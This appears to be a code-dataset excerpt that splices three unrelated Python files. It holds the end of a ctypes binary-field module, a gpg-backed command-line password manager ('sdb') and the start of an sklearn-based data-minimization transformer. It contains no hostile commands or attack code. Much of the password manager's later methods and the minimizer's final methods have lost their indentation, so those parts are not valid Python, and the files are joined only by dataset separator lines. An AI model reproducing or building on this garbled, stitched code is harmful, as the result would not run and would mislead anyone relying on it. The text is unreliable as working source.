        # Zero-pad the shorter serialization so both operands align byte-wise.
        left, right = bytes(op1), bytes(op2)
        width = max(len(left), len(right))
        left = left.ljust(width, b'\x00')
        right = right.ljust(width, b'\x00')
        apply_op = getattr(int, operation)
        return bytes(apply_op(x, y) for x, y in zip(left, right))
    def __and__(self, other) -> bytes:
        return BinaryField.__bitwise_operation(self, other, '__and__')
    def __or__(self, other) -> bytes:
        return BinaryField.__bitwise_operation(self, other, '__or__')
    def __xor__(self, other) -> bytes:
        return BinaryField.__bitwise_operation(self, other, '__xor__')
    def __invert__(self) -> bytes:
        return bytes((~byte) & 0xff for byte in bytes(self))
class PrimitiveTypeField(BinaryField):
    """
    Designed for primitive ctypes types, implements BinaryField.
    Subclasses pair a ctypes scalar with a struct FORMAT character.
    """
    def deserialize(self, buffer):
        """Re-initialize this field from the leading ``size_in_bytes`` bytes of ``buffer``."""
        if len(buffer) < self.size_in_bytes:
            raise ValueError('Given buffer is too small!')
        # BUG FIX: struct.unpack demands an exactly-sized buffer, so any buffer
        # longer than the field (the case the guard above implies is valid)
        # raised struct.error. unpack_from reads only the leading field.
        self.__init__(struct.unpack_from(self.FORMAT, buffer)[0])
    @property
    def size_in_bytes(self):
        return ctypes.sizeof(self)
    def __eq__(self, number) -> bool:
        if isinstance(number, int):
            return self.value == number
        elif isinstance(number, PrimitiveTypeField):
            return self.value == number.value
        else:
            # BUG FIX: the super() result was previously dropped (implicit None);
            # propagate it so the base-class comparison semantics apply.
            return super().__eq__(number)
    @abstractmethod
    def __str__(self) -> str:
        endianness = "be" if ">" in self.FORMAT else Endianness.HOST.value
        sign = "u" if self.FORMAT.isupper() else 'i'
        # BUG FIX: the value was always masked with 0xff and printed 2 digits
        # wide, truncating every field wider than one byte.
        width_bits = self.size_in_bytes * 8
        mask = (1 << width_bits) - 1
        return f'{endianness}_{sign}{width_bits}' \
               f'(0x{(self.value & mask):0{self.size_in_bytes * 2}X})'
    def __bytes__(self) -> bytes:
        return struct.pack(self.FORMAT, self.value)
# Host-endian primitive fields. Each pairs a ctypes scalar with
# PrimitiveTypeField; FORMAT is the struct format character
# (uppercase = unsigned).
class int8_t(ctypes.c_int8, PrimitiveTypeField):
    FORMAT = 'b'
class uint8_t(ctypes.c_uint8, PrimitiveTypeField):
    FORMAT = 'B'
class int16_t(ctypes.c_int16, PrimitiveTypeField):
    FORMAT = 'h'
class uint16_t(ctypes.c_uint16, PrimitiveTypeField):
    FORMAT = 'H'
class int32_t(ctypes.c_int32, PrimitiveTypeField):
    FORMAT = 'i'
class uint32_t(ctypes.c_uint32, PrimitiveTypeField):
    FORMAT = 'I'
class int64_t(ctypes.c_int64, PrimitiveTypeField):
    FORMAT = 'q'
class uint64_t(ctypes.c_uint64, PrimitiveTypeField):
    FORMAT = 'Q'
def big_endian_field(cls=None):
    """
    Class decorator forcing a BinaryField subclass to big endian by
    prefixing its struct FORMAT with '>'. Usable bare or with parentheses.
    """
    def decorate(klass):
        klass.FORMAT = f'>{klass.FORMAT}'
        return klass
    return decorate if cls is None else decorate(cls)
# Big-endian variants of the primitive fields: the decorator prefixes
# each inherited FORMAT with '>'.
@big_endian_field
class be_int8_t(int8_t):
    pass
@big_endian_field
class be_uint8_t(uint8_t):
    pass
@big_endian_field
class be_int16_t(int16_t):
    pass
@big_endian_field
class be_uint16_t(uint16_t):
    pass
@big_endian_field
class be_int32_t(int32_t):
    pass
@big_endian_field
class be_uint32_t(uint32_t):
    pass
@big_endian_field
class be_int64_t(int64_t):
    pass
@big_endian_field
class be_uint64_t(uint64_t):
    pass
| StarcoderdataPython |
41583 | import os
import ast
import sys
import math
import time
import string
import hashlib
import tempfile
import subprocess
from operator import itemgetter
from contextlib import contextmanager
from getpass import getpass
import random; random = random.SystemRandom()
import sdb.subprocess_compat as subprocess
from sdb.util import force_bytes
from sdb.clipboard import set_clipboard_once, ClipboardException
from sdb.diceware import WORDS
from sdb import gpg_agent
def encode(records):
    """Serialize records to UTF-8 bytes: one repr() per line, trailing newline."""
    lines = [repr(record) for record in records]
    return ('\n'.join(lines) + '\n').encode('utf-8')
def decode(str):
    """Inverse of encode(): parse one Python literal per non-empty line."""
    text = str.decode('utf-8')
    return [ast.literal_eval(line) for line in text.split('\n') if line]
# Character pools for password generation.
CASE_ALPHABET = string.ascii_letters
ALPHANUMERIC = CASE_ALPHABET + string.digits
EVERYTHING = ALPHANUMERIC + string.punctuation


def gen_password(choices=ALPHANUMERIC, length=10):
    """Return a password of ``length`` characters drawn uniformly from ``choices``."""
    picks = [random.choice(choices) for _ in range(length)]
    return ''.join(picks)
def requirements_satisfied(requirements, str):
    """True when every character of ``requirements`` appears in ``str``."""
    return all(required in str for required in requirements)
def gen_password_require(requirements, choices=ALPHANUMERIC, length=10):
    """
    Generate a password containing all the characters in requirements,
    by rejection sampling over gen_password(). Raises when the constraint
    is unsatisfiable (too many requirements, or one outside choices).
    """
    feasible = (len(requirements) <= length
                and requirements_satisfied(requirements, choices))
    if not feasible:
        raise Exception(
            "That's impossible, you can't make a password containing %r with only %r!" % (
                requirements, choices))
    while True:
        candidate = gen_password(choices, length)
        if requirements_satisfied(requirements, candidate):
            return candidate
def gen_password_entropy(entropy, choices=ALPHANUMERIC):
    """
    Generates a password of the desired entropy (in bits), calculating the
    required length from the size of the character pool.
    """
    bits_per_char = math.log(len(choices), 2)
    required_length = int(math.ceil(entropy / bits_per_char))
    return gen_password(choices=choices, length=required_length)
def match(needle, haystack):
    """Fuzzy subsequence score: 0 if needle is not a subsequence of haystack,
    otherwise 1 plus a bonus per character that favours early/tight matches."""
    score = 1
    cursor = 0
    previous_match = 0
    for ch in needle:
        # Advance to the next occurrence of ch.
        while cursor < len(haystack) and haystack[cursor] != ch:
            cursor += 1
        if cursor >= len(haystack):
            return 0
        score += 1 / (previous_match + 1.)
        previous_match = cursor
        cursor += 1
    return score
def record_score(term, records):
    # Fuzzy-match `term` against domain + username + notes (fields 0, 1, 3).
    return match(term, records[0] + records[1] + records[3])
def search(term, records):
    """Return records fuzzily matching ``term``, best score first."""
    scored = [(record_score(term, rec), rec) for rec in records]
    matching = [pair for pair in scored if pair[0]]
    matching.sort(key=itemgetter(0), reverse=True)
    return [rec for _, rec in matching]
def is_unique_list(lst):
    """True when ``lst`` contains no duplicate elements."""
    return len(set(lst)) == len(lst)
def disambiguate(records):
    """Return the shortest field projection (domain; +username; +notes) that
    makes each record distinct; fall back to the records themselves."""
    for getter in (itemgetter(0), itemgetter(0, 1), itemgetter(0, 1, 3)):
        projected = [getter(rec) for rec in records]
        if is_unique_list(projected):
            return projected
    # just in case none were unique
    return records
class GPGException(Exception):
    """Base class for errors raised from gpg subprocess failures."""
    pass
class IncorrectPasswordException(GPGException):
    """gpg reported 'decryption failed: bad key' (wrong master password)."""
    pass
class InvalidEncryptedFileException(GPGException):
    """Input was not recognisable OpenPGP data."""
    pass
class FileCorruptionException(GPGException):
    """Decryption hit corrupt/truncated data (CRC / zlib / packet errors)."""
    pass
def gpg_exception_factory(returncode, message):
    """Map a gpg exit code plus its stderr output (bytes) to a specific
    GPGException subclass; unknown failures become a generic Exception."""
    if returncode == 2:
        if b'decryption failed: bad key' in message:
            return IncorrectPasswordException(message)
        if b'CRC error;' in message:
            return FileCorruptionException(message)
        if b'fatal: zlib inflate problem: invalid distance' in message:
            return FileCorruptionException(message)
        if b'decryption failed: invalid packet' in message:
            return FileCorruptionException(message)
        # BUG FIX: the membership test was missing -- a bare bytes literal is
        # always truthy, so every other returncode-2 error was misreported as
        # InvalidEncryptedFileException and the fallback below was unreachable.
        if b'no valid OpenPGP data found' in message:
            return InvalidEncryptedFileException(message)
    return Exception("unkown error", returncode, message)
def dencrypt(command, pw, data):
    """
    Encrypts or decrypts, by running command.

    The passphrase is written first on gpg's stdin (fd 0, newline-terminated,
    matching --passphrase-fd 0), followed by the payload. Raises a
    GPGException subclass (via gpg_exception_factory) on non-zero exit.

    NOTE(review): stdin is written before communicate(); for very large
    payloads this could deadlock if gpg fills its stdout pipe first --
    confirm expected payload sizes.
    """
    if '\n' in pw:
        raise Exception('Newlines not allowed in passwords')
    proc = subprocess.Popen(
        command,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )
    proc.stdin.write(force_bytes(pw))
    proc.stdin.write(b'\n')
    proc.stdin.write(data)
    output, erroroutput = proc.communicate()
    if proc.returncode != 0:
        raise gpg_exception_factory(proc.returncode, erroroutput)
    return output
def encrypt(pw, data):
    # Symmetric (passphrase-only) encryption: AES cipher, SHA256 digest,
    # ASCII-armored output; passphrase arrives on fd 0 ahead of the payload.
    return dencrypt(
        ['gpg', '-c',
         '--passphrase-fd', '0',
         '--batch',
         '--armor',
         '--cipher-algo', 'AES',
         '--digest-algo', 'SHA256'],
        pw,
        data,
    )
def decrypt(pw, data):
    # Symmetric decryption counterpart of encrypt(); passphrase on fd 0.
    return dencrypt(
        ['gpg', '-d', '--passphrase-fd', '0', '--batch'],
        pw,
        data
    )
def get_tmp_file(filename):
    """Sibling hidden temp path for ``filename``: dir/.<name>.tmp."""
    directory, name = os.path.split(filename)
    return os.path.join(directory, '.{}.tmp'.format(name.lstrip('.')))
def get_backup_file(filename):
    """Sibling hidden backup path for ``filename``: dir/.<name>.bak."""
    directory, name = os.path.split(filename)
    return os.path.join(directory, '.{}.bak'.format(name.lstrip('.')))
@contextmanager
def atomic_replace(filename):
    """
    Context manager that atomically replaces ``filename``.

    The caller writes the new content to the yielded binary file object,
    which is backed by a hidden sibling ``.tmp`` file (0600, O_EXCL). On
    clean exit the temp file is fsynced, a backup of the old content is
    written (only when the content changed), and the temp file is renamed
    over the original. On any exception the temp file is removed and
    nothing happens to the original::

        with atomic_replace(filename) as f:
            f.write('asdf')
    """
    tmpfile_name = get_tmp_file(filename)
    # O_EXCL: fail rather than clobber a concurrent/stale temp file.
    fd = os.open(tmpfile_name, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o600)
    try:
        f = os.fdopen(fd, "w+b")
        yield f
        f.flush()
        os.fsync(fd) # fdatasync? I don't know
        f.seek(0)
        new_content = f.read()
        # Refuse to atomically replace the file with nothing.
        if not new_content:
            raise Exception("I don't think you want to blank this file...")
        try:
            with open(filename, 'rb') as current_f:
                current_content = current_f.read()
        except IOError:
            current_content = b''  # original doesn't exist yet
        # Only write a backup when the content actually changed.
        if current_content != new_content:
            with open(get_backup_file(filename), 'w+b') as backup_file:
                backup_file.write(current_content)
    except:
        # If there was an exception, remove the temporary file and reraise
        os.unlink(tmpfile_name)
        raise
    else:
        # No exception, rename the temp file over the original
        os.rename(tmpfile_name, filename)
    finally:
        # NOTE(review): if os.fdopen itself failed, ``f`` is unbound here --
        # confirm whether that path needs hardening.
        f.close()
def edit_in_editor(current):
    """Open ``current`` in $EDITOR (default vim) via a temp file; return the edited text.

    Before the NamedTemporaryFile is deleted its contents are overwritten
    with '0's so the plaintext doesn't linger on disk.
    """
    EDITOR = os.environ.get('EDITOR', 'vim')
    with tempfile.NamedTemporaryFile(mode='w+') as f:
        try:
            f.write(current)
            f.flush()
            subprocess.call([EDITOR, f.name])
            f.seek(0)
            return f.read()
        finally:
            # don't leave potentially private data lying around
            f.write('0' * os.path.getsize(f.name))
            f.flush()
def pretty_record(record):
    """Format a record as 'username@domain', plus ': notes' when notes exist."""
    label = '{}@{}'.format(record[1], record[0])
    if record[3]:
        return label + ': ' + record[3]
    return label
class InteractiveSession(object):
    def __init__(self, args, output=sys.stdout, input=sys.stdin, password=None):
        """Bind CLI args and I/O streams; locate gpg-agent and prime the master password.

        The gpg-agent cache key is derived from the MD5 of the database path
        so each database gets its own cached passphrase.
        """
        self.args = args
        self.file = args.file
        self.output = output
        self.input = input
        try:
            self.gpg_agent = gpg_agent.GpgAgent()
        except KeyError:
            self.gpg_agent = None  # no usable agent environment
        self.gpg_agent_password_id = 'sdb_m:{file_fingerprint}'.format(
            file_fingerprint=hashlib.md5(force_bytes(self.file)).hexdigest()
        )
        self.password = password
        if not self.password:
            self.password = self.get_master_password()
    def get_master_password(self, error=None):
        """Return (and cache) the master password.

        Resolution order: the cached value; gpg-agent's pinentry when stdin is
        a terminal and an agent is available; getpass() otherwise; or a plain
        read from the injected input stream (used by tests/scripted input).
        ``error`` is shown to the user when a previous attempt failed.
        """
        if self.password:
            return self.password
        if self.input == sys.stdin:
            if self.gpg_agent:
                error = error or 'X'
                self.password = self.gpg_agent.get_passphrase(
                    self.gpg_agent_password_id,
                    prompt='Master password',
                    error=error
                )
            else:
                if error:
                    self.output.write('Error: {error}, try again: '.format(error=error))
                self.password = getpass()
        else:
            self.output.write('Password: ')
            self.output.flush()
            self.password = self.input.readline().rstrip('\n')
        return self.password
    def clear_master_password(self):
        """Forget the cached master password, both locally and in gpg-agent."""
        self.password = None
        if self.gpg_agent:
            self.gpg_agent.clear_passphrase(self.gpg_agent_password_id)
    def prompt(self, prompt='', required=True, password=False):
        """Prompt for one line of input; loop until non-empty when ``required``.

        When ``password`` is True and stdin is the real terminal, getpass()
        is used so the input isn't echoed.
        """
        while True:
            if password and self.input == sys.stdin:
                line = getpass(prompt)
            else:
                self.output.write(prompt)
                self.output.flush()
                line = self.input.readline().rstrip('\n')
            if not required or line:
                return line
def get_record(self, domain=None):
domain = domain or self.prompt('Domain: ')
username = self.prompt('Username: ')
password = self.prompt(
'Password [blank to generate]: ',
required=False,
password=True
) or gen_password_entropy(128)
notes = self.prompt('Notes: ', required=False)
return (domain, username, password, notes)
def edit_record(self, record):
new_record = list(record)
new_record[0] = self.prompt('Name [%s]: ' % record[0], required=False) or record[0]
new_record[1] = self.prompt('Username [%s]: ' % record[1], required=False) or record[1]
pw = self.prompt('Password []/g: ', required=False, password=True) or record[2]
if pw == 'g':
new_record[2] = gen_password_entropy(128)
elif pw:
new_record[2] = pw
self.output.write("Notes: %s\n" % record[3])
edit = self.prompt('Edit? [n]: ', required=False) or 'n'
if edit[0] == 'y':
new_record[3] = edit_in_editor(record[3])
return tuple(new_record)
def find_record(self, query, records):
possibilities = search(query, records)
if len(possibilities) > 1:
choices = disambiguate(possibilities)
for i, choice in enumerate(choices):
self.output.write('%s) %s\n' % (i, choice))
choice = self.prompt('Which did you mean? [0]: ', required=False) or 0
return possibilities[int(choice)]
else:
return possibilities[0]
def read_records(self, error=None):
try:
with open(self.file, 'rb') as f:
password = self.get_master_password(error)
try:
return decode(decrypt(password, f.read()))
except IncorrectPasswordException:
self.clear_master_password()
return self.read_records(error='Incorrect password')
except:
self.clear_master_password()
raise
except IOError:
return []
def add_action(self):
record = self.get_record(self.args.domain or self.prompt('Domain: '))
def add(records):
return records + [record]
self.edit_transaction(add)
def show_action(self, clipboard=10):
record = self.find_record(self.args.domain or self.prompt("Domain: "), self.read_records())
self.output.write(pretty_record(record))
self.output.write("\n")
if clipboard:
try:
self.output.write("username in clipboard\n")
set_clipboard_once(record[1])
self.output.write("password in clipboard\n")
set_clipboard_once(record[2])
except ClipboardException as e:
self.output.write("couldn't set clipboard: %s\n" % e.output.split('\n')[0])
self.output.write(record[2])
self.output.write("\n")
else:
return record[2]
def edit_transaction(self, callback):
with atomic_replace(self.file) as out:
records = callback(self.read_records())
assert isinstance(records, list)
if not is_unique_list(records):
raise Exception("You have two identical records. I don't think you want this.")
out.write(encrypt(self.password, encode(records)))
out.seek(0)
assert records == decode(decrypt(self.password, out.read()))
def edit_action(self):
def edit(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
new_record = self.edit_record(record)
for i, choice in enumerate(records):
if choice == record:
records[i] = tuple(new_record)
return records
self.edit_transaction(edit)
def delete_action(self):
def delete(records):
record = self.find_record(self.args.domain or self.prompt('Domain: '), records)
self.output.write(pretty_record(record))
self.output.write('\n')
confirm = self.prompt('Really? [n]: ', required=False) or 'n'
if confirm[0] == 'y':
for i, choice in enumerate(records):
if choice == record:
del records[i]
else:
self.output.write("Ok, cancelled\n")
return records
self.edit_transaction(delete)
def raw_action(self):
try:
# PY3
output = self.output.buffer
except AttributeError:
output = self.output
output.write(encode(self.read_records()))
| StarcoderdataPython |
1727322 | <filename>apt/minimization/minimizer.py<gh_stars>10-100
"""
This module implements all classes needed to perform data minimization
"""
from typing import Union
import pandas as pd
import numpy as np
import copy
import sys
from scipy.spatial import distance
from sklearn.base import BaseEstimator, TransformerMixin, MetaEstimatorMixin
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
class GeneralizeToRepresentative(BaseEstimator, MetaEstimatorMixin, TransformerMixin):
""" A transformer that generalizes data to representative points.
Learns data generalizations based on an original model's predictions
and a target accuracy. Once the generalizations are learned, can
receive one or more data records and transform them to representative
points based on the learned generalization.
An alternative way to use the transformer is to supply ``cells`` and
``features`` in init or set_params and those will be used to transform
data to representatives. In this case, fit must still be called but
there is no need to supply it with ``X`` and ``y``, and there is no
need to supply an existing ``estimator`` to init.
In summary, either ``estimator`` and ``target_accuracy`` should be
supplied or ``cells`` and ``features`` should be supplied.
Parameters
----------
estimator : estimator, optional
The original model for which generalization is being performed.
Should be pre-fitted.
target_accuracy : float, optional
The required accuracy when applying the base model to the
generalized data. Accuracy is measured relative to the original
accuracy of the model.
features : list of str, optional
The feature names, in the order that they appear in the data.
categorical_features: list of str, optional
The list of categorical features should only be supplied when
passing data as a pandas dataframe.
features_to_minimize: List of str or numbers, optional
The features that need to be minimized in case of pandas data,
and indexes of features in case of numpy data.
cells : list of object, optional
The cells used to generalize records. Each cell must define a
range or subset of categories for each feature, as well as a
representative value for each feature.
This parameter should be used when instantiating a transformer
object without first fitting it.
train_only_QI : Bool, optional
The required method to train data set for minimizing. Default is
to train the tree just on the features that are given as
features_to_minimize.
Attributes
----------
cells_ : list of object
The cells used to generalize records, as learned when calling fit.
ncp_ : float
The NCP (information loss) score of the resulting generalization,
as measured on the training data.
generalizations_ : object
The generalizations that were learned (actual feature ranges).
Notes
-----
"""
    def __init__(self, estimator=None, target_accuracy=0.998, features=None,
                 cells=None, categorical_features=None, features_to_minimize: Union[np.ndarray, list] = None
                 , train_only_QI=True):
        # Store configuration only; all computation happens in fit().
        self.estimator = estimator
        self.target_accuracy = target_accuracy
        self.features = features
        self.cells = cells
        # Normalize a falsy categorical_features argument to an empty list.
        self.categorical_features = []
        if categorical_features:
            self.categorical_features = categorical_features
        self.features_to_minimize = features_to_minimize
        self.train_only_QI = train_only_QI
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and contained
subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
ret = {}
ret['target_accuracy'] = self.target_accuracy
if deep:
ret['features'] = copy.deepcopy(self.features)
ret['cells'] = copy.deepcopy(self.cells)
ret['estimator'] = self.estimator
else:
ret['features'] = copy.copy(self.features)
ret['cells'] = copy.copy(self.cells)
return ret
def set_params(self, **params):
"""Set the parameters of this estimator.
Returns
-------
self : object
Returns self.
"""
if 'target_accuracy' in params:
self.target_accuracy = params['target_accuracy']
if 'features' in params:
self.features = params['features']
if 'cells' in params:
self.cells = params['cells']
return self
    @property
    def generalizations(self):
        # Read-only view of the learned generalizations (set during fit).
        return self.generalizations_
def fit_transform(self, X: Union[np.ndarray, pd.DataFrame] = None, y: Union[np.ndarray, pd.DataFrame] = None):
"""Learns the generalizations based on training data, and applies them to the data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features), optional
The training input samples.
y : array-like, shape (n_samples,), optional
The target values. An array of int.
This should contain the predictions of the original model on ``X``.
Returns
-------
X_transformed : numpy or pandas according to the input type, shape (n_samples, n_features)
The array containing the representative values to which each record in
``X`` is mapped.
"""
self.fit(X, y)
return self.transform(X)
    def fit(self, X: Union[np.ndarray, pd.DataFrame] = None, y: Union[np.ndarray, pd.DataFrame] = None):
        """Learns the generalizations based on training data.

        Trains a decision tree on (a subset of) the features, derives
        generalization "cells" from its leaves, then iteratively either
        prunes the tree (if relative accuracy exceeds the target) or drops
        features from the generalization (if accuracy falls short).

        Parameters
        ----------
        X : {array-like, sparse matrix}, shape (n_samples, n_features), optional
            The training input samples.
        y : array-like, shape (n_samples,), optional
            The target values. An array of int.
            This should contain the predictions of the original model on ``X``.

        Returns
        -------
        self : object
            The fitted transformer, with ``cells_``, ``generalizations_``
            and ``ncp_`` populated.
        """
        # take into account that estimator, X, y, cells, features may be None
        if X is not None:
            if type(X) == np.ndarray:
                self.is_numpy = True
            else:
                self.is_numpy = False
        if X is not None and y is not None:
            if self.is_numpy:
                X, y = check_X_y(X, y, accept_sparse=True)
            self.n_features_ = X.shape[1]
        elif self.features:
            self.n_features_ = len(self.features)
        else:
            self.n_features_ = 0
        if self.features:
            self._features = self.features
        # if features is None, use numbers instead of names
        elif self.n_features_ != 0:
            self._features = [i for i in range(self.n_features_)]
        else:
            self._features = None
        if self.cells:
            self.cells_ = self.cells
        else:
            self.cells_ = {}
        self.categorical_values = {}
        # Going to fit
        # (currently not dealing with option to fit with only X and y and no estimator)
        if self.estimator and X is not None and y is not None:
            # --- split out the quasi-identifier (QI) columns ---
            if self.is_numpy:
                if not self.features_to_minimize:
                    self.features_to_minimize = [i for i in range(len(self._features))]
                x_QI = X[:, self.features_to_minimize]
                self.features_to_minimize = [self._features[i] for i in self.features_to_minimize]
                X = pd.DataFrame(X, columns=self._features)
            else:
                if not self.features_to_minimize:
                    self.features_to_minimize = self._features
                x_QI = X.loc[:, self.features_to_minimize]
            x_QI = pd.DataFrame(x_QI, columns=self.features_to_minimize)
            # divide dataset into train and test
            used_data = X
            if self.train_only_QI:
                used_data = x_QI
            X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
                                                                test_size=0.4,
                                                                random_state=18)
            X_train_QI = X_train.loc[:, self.features_to_minimize]
            X_test_QI = X_test.loc[:, self.features_to_minimize]
            used_X_train = X_train
            if self.train_only_QI:
                used_X_train = X_train_QI
            # collect feature data (such as min, max) used later for NCP
            feature_data = {}
            for feature in self._features:
                if feature not in feature_data.keys():
                    fd = {}
                    values = list(X.loc[:, feature])
                    if feature not in self.categorical_features:
                        fd['min'] = min(values)
                        fd['max'] = max(values)
                        fd['range'] = max(values) - min(values)
                    else:
                        fd['range'] = len(values)
                    feature_data[feature] = fd
            # prepare data for DT: impute numerics, one-hot encode categoricals
            categorical_features = [f for f in self._features if f in self.categorical_features and
                                    f in self.features_to_minimize]
            numeric_transformer = Pipeline(
                steps=[('imputer', SimpleImputer(strategy='constant', fill_value=0))]
            )
            numeric_features = [f for f in self._features if f not in self.categorical_features and
                                f in self.features_to_minimize]
            categorical_transformer = OneHotEncoder(handle_unknown="ignore", sparse=False)
            preprocessor_QI_features = ColumnTransformer(
                transformers=[
                    ("num", numeric_transformer, numeric_features),
                    ("cat", categorical_transformer, categorical_features),
                ]
            )
            preprocessor_QI_features.fit(x_QI)
            # preprocessor to fit data that have features not included in QI (to get accuracy)
            numeric_features = [f for f in self._features if f not in self.categorical_features]
            numeric_transformer = Pipeline(
                steps=[('imputer', SimpleImputer(strategy='constant', fill_value=0))]
            )
            categorical_transformer = OneHotEncoder(handle_unknown="ignore", sparse=False)
            preprocessor = ColumnTransformer(
                transformers=[
                    ("num", numeric_transformer, numeric_features),
                    ("cat", categorical_transformer, self.categorical_features),
                ]
            )
            preprocessor.fit(X)
            x_prepared = preprocessor.transform(X_train)
            if self.train_only_QI:
                x_prepared = preprocessor_QI_features.transform(X_train_QI)
            self._preprocessor = preprocessor
            self.cells_ = {}
            # --- train the decision tree and derive leaf cells ---
            self.dt_ = DecisionTreeClassifier(random_state=0, min_samples_split=2,
                                              min_samples_leaf=1)
            self.dt_.fit(x_prepared, y_train)
            self._modify_categorical_features(used_data)
            x_prepared = pd.DataFrame(x_prepared, columns=self.categorical_data.columns)
            self._calculate_cells()
            self._modify_cells()
            # features that are not from QI should not be part of generalizations
            for feature in self._features:
                if feature not in self.features_to_minimize:
                    self._remove_feature_from_cells(self.cells_, self.cells_by_id_, feature)
            nodes = self._get_nodes_level(0)
            self._attach_cells_representatives(x_prepared, used_X_train, y_train, nodes)
            # self.cells_ currently holds the generalization created from the tree leaves
            self._calculate_generalizations()
            # apply generalizations to test data
            x_prepared_test = preprocessor.transform(X_test)
            if self.train_only_QI:
                x_prepared_test = preprocessor_QI_features.transform(X_test_QI)
            x_prepared_test = pd.DataFrame(x_prepared_test, index=X_test.index, columns=self.categorical_data.columns)
            generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_, self.cells_by_id_)
            # check accuracy of the estimator on the generalized hold-out set
            accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
            print('Initial accuracy of model on generalized data, relative to original model predictions '
                  '(base generalization derived from tree, before improvements): %f' % accuracy)
            # if accuracy above threshold, improve generalization by pruning the tree
            if accuracy > self.target_accuracy:
                print('Improving generalizations')
                level = 1
                while accuracy > self.target_accuracy:
                    try:
                        # keep the previous state so we can roll back when
                        # pruning one more level drops below the target
                        cells_previous_iter = self.cells_
                        generalization_prev_iter = self.generalizations_
                        cells_by_id_prev = self.cells_by_id_
                        nodes = self._get_nodes_level(level)
                        self._calculate_level_cells(level)
                        self._attach_cells_representatives(x_prepared, used_X_train, y_train, nodes)
                        self._calculate_generalizations()
                        generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_,
                                                       self.cells_by_id_)
                        accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
                        # if accuracy passed threshold roll back to previous iteration generalizations
                        if accuracy < self.target_accuracy:
                            self.cells_ = cells_previous_iter
                            self.generalizations_ = generalization_prev_iter
                            self.cells_by_id_ = cells_by_id_prev
                            break
                        else:
                            print('Pruned tree to level: %d, new relative accuracy: %f' % (level, accuracy))
                            level += 1
                    except Exception as e:
                        print(e)
                        break
            # if accuracy below threshold, improve accuracy by removing features from generalization
            elif accuracy < self.target_accuracy:
                print('Improving accuracy')
                while accuracy < self.target_accuracy:
                    removed_feature = self._remove_feature_from_generalization(X_test, x_prepared_test,
                                                                               nodes, y_test,
                                                                               feature_data, accuracy)
                    if removed_feature is None:
                        break
                    self._calculate_generalizations()
                    generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_, self.cells_by_id_)
                    accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
                    print('Removed feature: %s, new relative accuracy: %f' % (removed_feature, accuracy))
            # self.cells_ currently holds the chosen generalization based on target accuracy
            # calculate iLoss
            self.ncp_ = self._calculate_ncp(X_test, self.generalizations_, feature_data)
        # Return the transformer
        return self
    def transform(self, X: Union[np.ndarray, pd.DataFrame]):
        """ Transforms data records to representative points.

        Parameters
        ----------
        X : {array-like, sparse-matrix}, shape (n_samples, n_features), If provided as a pandas dataframe,
            may contain both numeric and categorical data.
            The input samples.

        Returns
        -------
        X_transformed : numpy or pandas according to the input type, shape (n_samples, n_features)
            The array containing the representative values to which each record in
            ``X`` is mapped.
        """
        # Check if fit has been called
        msg = 'This %(name)s instance is not initialized yet. ' \
              'Call ‘fit’ or ‘set_params’ with ' \
              'appropriate arguments before using this method.'
        # NOTE(review): the attribute names here lack the trailing
        # underscore ('cells_'), so this guard checks constructor
        # attributes that always exist — confirm intended.
        check_is_fitted(self, ['cells', 'features'], msg=msg)

        if type(X) == np.ndarray:
            # Input validation
            X = check_array(X, accept_sparse=True)
            self.is_numpy = True
            X = pd.DataFrame(X, columns=self._features)
        else:
            self.is_numpy = False

        if X.shape[1] != self.n_features_ and self.n_features_ != 0:
            raise ValueError('Shape of input is different from what was seen'
                             'in `fit`')
        if not self._features:
            self._features = [i for i in range(X.shape[1])]

        representatives = pd.DataFrame(columns=self._features)  # only columns
        generalized = pd.DataFrame(X, columns=self._features, copy=True)  # original data
        mapped = np.zeros(X.shape[0])  # to mark records we already mapped
        # iterate over cells (leaves in decision tree)
        for i in range(len(self.cells_)):
            # Copy the representatives from the cells into another data structure:
            # iterate over features in test data
            for feature in self._features:
                # if feature has a representative value in the cell and should not
                # be left untouched, take the representative value
                if feature in self.cells_[i]['representative'] and \
                        ('untouched' not in self.cells_[i]
                         or feature not in self.cells_[i]['untouched']):
                    representatives.loc[i, feature] = self.cells_[i]['representative'][feature]
                # else, drop the feature (removes from representatives columns that
                # do not have a representative value or should remain untouched)
                elif feature in representatives.columns.tolist():
                    representatives = representatives.drop(feature, axis=1)

            # get the indexes of all records that map to this cell
            indexes = self._get_record_indexes_for_cell(X, self.cells_[i], mapped)
            # replace the values in the representative columns with the representative
            # values (leaves others untouched)
            if indexes and not representatives.columns.empty:
                if len(indexes) > 1:
                    replace = pd.concat([representatives.loc[i].to_frame().T] * len(indexes)).reset_index(drop=True)
                else:
                    replace = representatives.loc[i].to_frame().T.reset_index(drop=True)
                replace.index = indexes
                generalized.loc[indexes, representatives.columns] = replace
        # return the same container type the caller passed in
        if self.is_numpy:
            return generalized.to_numpy()
        return generalized
def _get_record_indexes_for_cell(self, X, cell, mapped):
indexes = []
for index, row in X.iterrows():
if not mapped.item(index) and self._cell_contains(cell, row, index, mapped):
indexes.append(index)
return indexes
def _cell_contains(self, cell, x, i, mapped):
for f in self._features:
if f in cell['ranges']:
if not self._cell_contains_numeric(f, cell['ranges'][f], x):
return False
elif f in cell['categories']:
if not self._cell_contains_categorical(f, cell['categories'][f], x):
return False
elif f in cell['untouched']:
continue
else:
raise TypeError("feature " + f + "not found in cell" + cell['id'])
# Mark as mapped
mapped.itemset(i, 1)
return True
def _modify_categorical_features(self, X):
self.categorical_values = {}
self.oneHotVectorFeaturesToFeatures = {}
features_to_remove = []
used_features = self._features
